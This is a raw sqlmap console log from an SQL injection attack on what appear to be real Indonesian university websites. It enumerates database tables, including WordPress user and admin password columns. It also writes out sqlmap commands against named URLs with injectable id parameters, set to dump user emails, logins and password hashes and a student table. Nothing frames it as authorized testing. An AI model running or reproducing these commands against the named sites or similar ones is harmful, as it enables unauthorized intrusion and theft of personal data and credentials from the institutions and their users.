[09:44:07] [INFO] fetching columns for table 'wp_comments' in database 'elite'
[09:44:07] [INFO] the SQL query used returns 15 entries
[09:44:08] [INFO] retrieved: "comment_ID","bigint(20) unsigned"
[09:44:08] [INFO] retrieved: "comment_post_ID","bigint(20) unsigned"
[09:44:09] [INFO] retrieved: "comment_author","tinytext"
[09:44:09] [INFO] retrieved: "comment_author_email","varchar(100)"
[09:44:10] [INFO] retrieved: "comment_author_url","varchar(200)"
[09:44:10] [INFO] retrieved: "comment_author_IP","varchar(100)"
[09:44:11] [INFO] retrieved: "comment_date","datetime"
[09:44:11] [INFO] retrieved: "comment_date_gmt","datetime"
[09:44:12] [INFO] retrieved: "comment_content","text"
[09:44:12] [INFO] retrieved: "comment_karma","int(11)"
[09:44:13] [INFO] retrieved: "comment_approved","varchar(20)"
[09:44:13] [INFO] retrieved: "comment_agent","varchar(255)"
[09:44:14] [INFO] retrieved: "comment_type","varchar(20)"
[09:44:14] [INFO] retrieved: "comment_parent","bigint(20) unsigned"
[09:44:14] [INFO] retrieved: "user_id","bigint(20) unsigned"
[09:44:15] [INFO] fetching columns for table 'tbl_reviewer' in database 'elite'
[09:44:15] [INFO] the SQL query used returns 5 entries
[09:44:15] [INFO] retrieved: "id","int(255)"
[09:44:15] [INFO] retrieved: "uid","varchar(255)"
[09:44:16] [INFO] retrieved: "name1","varchar(255)"
[09:44:16] [INFO] retrieved: "email1","varchar(255)"
[09:44:17] [INFO] retrieved: "invited","int(255)"
[09:44:17] [INFO] fetching columns for table 'tbl_visitors' in database 'elite'
[09:44:17] [INFO] the SQL query used returns 6 entries
[09:44:17] [INFO] retrieved: "id","int(13)"
[09:44:18] [INFO] retrieved: "date","varchar(255)"
[09:44:18] [INFO] retrieved: "time","varchar(255)"
[09:44:18] [INFO] retrieved: "ip","varchar(255)"
[09:44:18] [INFO] retrieved: "new_ip","varchar(255)"
[09:44:18] [INFO] retrieved: "hostname","varchar(255)"
[09:44:19] [INFO] fetching columns for table 'tbl_files' in database 'elite'
[09:44:19] [INFO] the SQL query used returns 25 entries
[09:44:19] [INFO] retrieved: "id","int(255)"
[09:44:19] [INFO] retrieved: "uid","varchar(255)"
[09:44:20] [INFO] retrieved: "date","varchar(255)"
[09:44:20] [INFO] retrieved: "time","varchar(255)"
[09:44:20] [INFO] retrieved: "ip","varchar(255)"
[09:44:20] [INFO] retrieved: "hostname","varchar(255)"
[09:44:21] [INFO] retrieved: "showname","text"
[09:44:21] [INFO] retrieved: "filename","text"
[09:44:22] [INFO] retrieved: "filesize","varchar(255)"
[09:44:22] [INFO] retrieved: "filetype","varchar(255)"
[09:44:23] [INFO] retrieved: "tipe","varchar(255)"
[09:44:23] [INFO] retrieved: "owner","varchar(255)"
[09:44:24] [INFO] retrieved: "regcode","varchar(255)"
[09:44:24] [INFO] retrieved: "count","int(255)"
[09:44:24] [INFO] retrieved: "info","text"
[09:44:25] [INFO] retrieved: "filetitle","text"
[09:44:25] [INFO] retrieved: "fileabstract","text"
[09:44:26] [INFO] retrieved: "filekeyword","text"
[09:44:26] [INFO] retrieved: "group","varchar(255)"
[09:44:27] [INFO] retrieved: "grup","varchar(255)"
[09:44:27] [INFO] retrieved: "allauthors","text"
[09:44:27] [INFO] retrieved: "topic","varchar(255)"
[09:44:28] [INFO] retrieved: "abstract_uid","varchar(255)"
[09:44:28] [INFO] retrieved: "reviewed","varchar(1)"
[09:44:29] [INFO] retrieved: "assigned","varchar(255)"
[09:44:29] [INFO] fetching columns for table 'tbl_topic' in database 'elite'
[09:44:30] [INFO] the SQL query used returns 3 entries
[09:44:30] [INFO] retrieved: "id","int(10)"
[09:44:30] [INFO] retrieved: "uid","varchar(255)"
[09:44:30] [INFO] retrieved: "topic","varchar(255)"
[09:44:30] [INFO] fetching columns for table 'wp_commentmeta' in database 'elite
'
[09:44:30] [INFO] the SQL query used returns 4 entries
[09:44:30] [INFO] retrieved: "meta_id","bigint(20) unsigned"
[09:44:31] [INFO] retrieved: "comment_id","bigint(20) unsigned"
[09:44:31] [INFO] retrieved: "meta_key","varchar(255)"
[09:44:31] [INFO] retrieved: "meta_value","longtext"
[09:44:31] [INFO] fetching columns for table 'tbl_system' in database 'elite'
[09:44:32] [INFO] the SQL query used returns 25 entries
[09:44:32] [INFO] retrieved: "id","int(255)"
[09:44:32] [INFO] retrieved: "mainpage","text"
[09:44:33] [INFO] retrieved: "password_admin","varchar(255)"
[09:44:33] [INFO] retrieved: "bigtitle","varchar(255)"
[09:44:34] [INFO] retrieved: "smalltitle","varchar(255)"
[09:44:34] [INFO] retrieved: "committee_email","varchar(255)"
[09:44:35] [INFO] retrieved: "webmaster_email","varchar(255)"
[09:44:35] [INFO] retrieved: "system_email","varchar(255)"
[09:44:36] [INFO] retrieved: "headerpic","varchar(255)"
[09:44:36] [INFO] retrieved: "finance","text"
[09:44:37] [INFO] retrieved: "var1","varchar(255)"
[09:44:37] [INFO] retrieved: "var2","varchar(255)"
[09:44:38] [INFO] retrieved: "var3","varchar(255)"
[09:44:38] [INFO] retrieved: "var4","varchar(255)"
[09:44:39] [INFO] retrieved: "var5","varchar(255)"
[09:44:39] [INFO] retrieved: "var5b","varchar(255)"
[09:44:40] [INFO] retrieved: "var6","varchar(255)"
[09:44:40] [INFO] retrieved: "var7","varchar(255)"
[09:44:41] [INFO] retrieved: "var8","varchar(255)"
[09:44:41] [INFO] retrieved: "var9","varchar(255)"
[09:44:42] [INFO] retrieved: "var10","varchar(255)"
[09:44:42] [INFO] retrieved: "var11","varchar(255)"
[09:44:43] [INFO] retrieved: "var12","varchar(255)"
[09:44:43] [INFO] retrieved: "var13","varchar(10)"
[09:44:44] [INFO] retrieved: "var14","varchar(10)"
[09:44:44] [INFO] fetching columns for table 'wp_posts' in database 'elite'
[09:44:45] [INFO] the SQL query used returns 23 entries
[09:44:45] [INFO] retrieved: "ID","bigint(20) unsigned"
[09:44:45] [INFO] retrieved: "post_author","bigint(20) unsigned"
[09:44:46] [INFO] retrieved: "post_date","datetime"
[09:44:46] [INFO] retrieved: "post_date_gmt","datetime"
[09:44:47] [INFO] retrieved: "post_content","longtext"
[09:44:47] [INFO] retrieved: "post_title","text"
[09:44:48] [INFO] retrieved: "post_excerpt","text"
[09:44:48] [INFO] retrieved: "post_status","varchar(20)"
[09:44:49] [INFO] retrieved: "comment_status","varchar(20)"
[09:44:49] [INFO] retrieved: "ping_status","varchar(20)"
[09:44:49] [INFO] retrieved: "post_password","varchar(20)"
[09:44:50] [INFO] retrieved: "post_name","varchar(200)"
[09:44:50] [INFO] retrieved: "to_ping","text"
[09:44:51] [INFO] retrieved: "pinged","text"
[09:44:51] [INFO] retrieved: "post_modified","datetime"
[09:44:52] [INFO] retrieved: "post_modified_gmt","datetime"
[09:44:52] [INFO] retrieved: "post_content_filtered","longtext"
[09:44:53] [INFO] retrieved: "post_parent","bigint(20) unsigned"
[09:44:53] [INFO] retrieved: "guid","varchar(255)"
[09:44:54] [INFO] retrieved: "menu_order","int(11)"
[09:44:54] [INFO] retrieved: "post_type","varchar(20)"
[09:44:55] [INFO] retrieved: "post_mime_type","varchar(100)"
[09:44:55] [INFO] retrieved: "comment_count","bigint(20)"
[09:44:55] [INFO] fetching columns for table 'wp_term_relationships' in database
'elite'
[09:44:55] [INFO] the SQL query used returns 3 entries
[09:44:56] [INFO] retrieved: "object_id","bigint(20) unsigned"
[09:44:56] [INFO] retrieved: "term_taxonomy_id","bigint(20) unsigned"
[09:44:56] [INFO] retrieved: "term_order","int(11)"
[09:44:56] [INFO] fetching columns for table 'wp_termmeta' in database 'elite'
[09:44:57] [INFO] the SQL query used returns 4 entries
[09:44:57] [INFO] retrieved: "meta_id","bigint(20) unsigned"
[09:44:57] [INFO] retrieved: "term_id","bigint(20) unsigned"
[09:44:57] [INFO] retrieved: "meta_key","varchar(255)"
[09:44:57] [INFO] retrieved: "meta_value","longtext"
Database: elite
Table: tbl_reviewer
[5 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| email1 | varchar(255) |
| id | int(255) |
| invited | int(255) |
| name1 | varchar(255) |
| uid | varchar(255) |
+---------+--------------+
Database: elite
Table: tbl_participants
[26 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| date | varchar(255) |
| time | varchar(255) |
| city | varchar(255) |
| country | varchar(255) |
| email | varchar(255) |
| fax | varchar(255) |
| fee | varchar(255) |
| from_internal | varchar(255) |
| hostname | varchar(255) |
| id | int(255) |
| info | text |
| institution | text |
| ip | varchar(255) |
| is_presenter | varchar(255) |
| name1 | varchar(255) |
| name2 | varchar(255) |
| name3 | varchar(255) |
| password2 | varchar(255) |
| phone | varchar(255) |
| procbook | varchar(255) |
| registered | varchar(255) |
| street | varchar(255) |
| title | varchar(255) |
| uid | varchar(255) |
| userid | varchar(255) |
| zipcode | varchar(255) |
+---------------+--------------+
Database: elite
Table: wp_term_taxonomy
[6 columns]
+------------------+---------------------+
| Column | Type |
+------------------+---------------------+
| count | bigint(20) |
| description | longtext |
| parent | bigint(20) unsigned |
| taxonomy | varchar(32) |
| term_id | bigint(20) unsigned |
| term_taxonomy_id | bigint(20) unsigned |
+------------------+---------------------+
Database: elite
Table: wp_commentmeta
[4 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| comment_id | bigint(20) unsigned |
| meta_id | bigint(20) unsigned |
| meta_key | varchar(255) |
| meta_value | longtext |
+------------+---------------------+
Database: elite
Table: tbl_system
[25 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| bigtitle | varchar(255) |
| committee_email | varchar(255) |
| finance | text |
| headerpic | varchar(255) |
| id | int(255) |
| mainpage | text |
| password_admin | varchar(255) |
| smalltitle | varchar(255) |
| system_email | varchar(255) |
| var1 | varchar(255) |
| var10 | varchar(255) |
| var11 | varchar(255) |
| var12 | varchar(255) |
| var13 | varchar(10) |
| var14 | varchar(10) |
| var2 | varchar(255) |
| var3 | varchar(255) |
| var4 | varchar(255) |
| var5 | varchar(255) |
| var5b | varchar(255) |
| var6 | varchar(255) |
| var7 | varchar(255) |
| var8 | varchar(255) |
| var9 | varchar(255) |
| webmaster_email | varchar(255) |
+-----------------+--------------+
Database: elite
Table: tbl_paper_reviewer
[6 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| id | int(255) |
| paper_uid | varchar(255) |
| review | text |
| reviewer_name | varchar(255) |
| reviewer_uid | varchar(255) |
| uid | varchar(255) |
+---------------+--------------+
Database: elite
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| display_name | varchar(250) |
| ID | bigint(20) unsigned |
| user_activation_key | varchar(255) |
| user_email | varchar(100) |
| user_login | varchar(60) |
| user_nicename | varchar(50) |
| user_pass | varchar(255) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
+---------------------+---------------------+
C:\>Python27\sqlmap\sqlmap.py -u http://elite.event.uinjkt.ac.id/acs/pages/abstr
act.php?id=78 -D elite -T wp_users -C user_email,user_login,user_pass, --dump
Database: elite
Table: wp_terms
[4 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| name | varchar(200) |
| slug | varchar(200) |
| term_group | bigint(10) |
| term_id | bigint(20) unsigned |
+------------+---------------------+
Database: elite
Table: wp_links
[13 columns]
+------------------+---------------------+
| Column | Type |
+------------------+---------------------+
| link_description | varchar(255) |
| link_id | bigint(20) unsigned |
| link_image | varchar(255) |
| link_name | varchar(255) |
| link_notes | mediumtext |
| link_owner | bigint(20) unsigned |
| link_rating | int(11) |
| link_rel | varchar(255) |
| link_rss | varchar(255) |
| link_target | varchar(25) |
| link_updated | datetime |
| link_url | varchar(255) |
| link_visible | varchar(20) |
+------------------+---------------------+
Database: elite
Table: wp_comments
[15 columns]
+----------------------+---------------------+
| Column | Type |
+----------------------+---------------------+
| comment_agent | varchar(255) |
| comment_approved | varchar(20) |
| comment_author | tinytext |
| comment_author_email | varchar(100) |
| comment_author_IP | varchar(100) |
| comment_author_url | varchar(200) |
| comment_content | text |
| comment_date | datetime |
| comment_date_gmt | datetime |
| comment_ID | bigint(20) unsigned |
| comment_karma | int(11) |
| comment_parent | bigint(20) unsigned |
| comment_post_ID | bigint(20) unsigned |
| comment_type | varchar(20) |
| user_id | bigint(20) unsigned |
+----------------------+---------------------+
Database: elite
Table: wp_options
[4 columns]
+--------------+---------------------+
| Column | Type |
+--------------+---------------------+
| autoload | varchar(20) |
| option_id | bigint(20) unsigned |
| option_name | varchar(191) |
| option_value | longtext |
+--------------+---------------------+
Database: elite
Table: wp_usermeta
[4 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| meta_key | varchar(255) |
| meta_value | longtext |
| umeta_id | bigint(20) unsigned |
| user_id | bigint(20) unsigned |
+------------+---------------------+
Database: elite
Table: tbl_files
[25 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| count | int(255) |
| date | varchar(255) |
| group | varchar(255) |
| time | varchar(255) |
| abstract_uid | varchar(255) |
| allauthors | text |
| assigned | varchar(255) |
| fileabstract | text |
| filekeyword | text |
| filename | text |
| filesize | varchar(255) |
| filetitle | text |
| filetype | varchar(255) |
| grup | varchar(255) |
| hostname | varchar(255) |
| id | int(255) |
| info | text |
| ip | varchar(255) |
| owner | varchar(255) |
| regcode | varchar(255) |
| reviewed | varchar(1) |
| showname | text |
| tipe | varchar(255) |
| topic | varchar(255) |
| uid | varchar(255) |
+--------------+--------------+
Database: elite
Table: tbl_abstract
[18 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| date | varchar(255) |
| time | varchar(255) |
| accepted | varchar(1) |
| authors | text |
| code1 | varchar(255) |
| content | text |
| hostname | varchar(255) |
| id | int(10) |
| institutions | text |
| ip | varchar(255) |
| keywords | varchar(255) |
| last_update | varchar(255) |
| payment | varchar(255) |
| presenter | varchar(255) |
| title | text |
| topic | varchar(255) |
| uid | varchar(255) |
| uid_owner | varchar(255) |
+--------------+--------------+
Database: elite
Table: tbl_topic
[3 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| id | int(10) |
| topic | varchar(255) |
| uid | varchar(255) |
+--------+--------------+
Database: elite
Table: wp_postmeta
[4 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| meta_id | bigint(20) unsigned |
| meta_key | varchar(255) |
| meta_value | longtext |
| post_id | bigint(20) unsigned |
+------------+---------------------+
Database: elite
Table: tbl_visitors
[6 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| date | varchar(255) |
| time | varchar(255) |
| hostname | varchar(255) |
| id | int(13) |
| ip | varchar(255) |
| new_ip | varchar(255) |
+----------+--------------+
Database: elite
Table: wp_posts
[23 columns]
+-----------------------+---------------------+
| Column | Type |
+-----------------------+---------------------+
| comment_count | bigint(20) |
| comment_status | varchar(20) |
| guid | varchar(255) |
| ID | bigint(20) unsigned |
| menu_order | int(11) |
| ping_status | varchar(20) |
| pinged | text |
| post_author | bigint(20) unsigned |
| post_content | longtext |
| post_content_filtered | longtext |
| post_date | datetime |
| post_date_gmt | datetime |
| post_excerpt | text |
| post_mime_type | varchar(100) |
| post_modified | datetime |
| post_modified_gmt | datetime |
| post_name | varchar(200) |
| post_parent | bigint(20) unsigned |
| post_password | varchar(20) |
| post_status | varchar(20) |
| post_title | text |
| post_type | varchar(20) |
| to_ping | text |
+-----------------------+---------------------+
Database: elite
Table: wp_term_relationships
[3 columns]
+------------------+---------------------+
| Column | Type |
+------------------+---------------------+
| object_id | bigint(20) unsigned |
| term_order | int(11) |
| term_taxonomy_id | bigint(20) unsigned |
+------------------+---------------------+
Database: elite
Table: wp_termmeta
[4 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| meta_id | bigint(20) unsigned |
| meta_key | varchar(255) |
| meta_value | longtext |
| term_id | bigint(20) unsigned |
+------------+---------------------+
[09:44:57] [INFO] fetched data logged to text files under 'C:\Users\SRS\.sqlmap\
output\elite.event.uinjkt.ac.id'
[*] shutting down at 09:44:57

C:\>Python27\sqlmap\sqlmap.py -u http://akademik.fh.unsoed.ac.id/lowongan.php?id
=110 -D c1akademikfh -T mahasiswa -C --dump
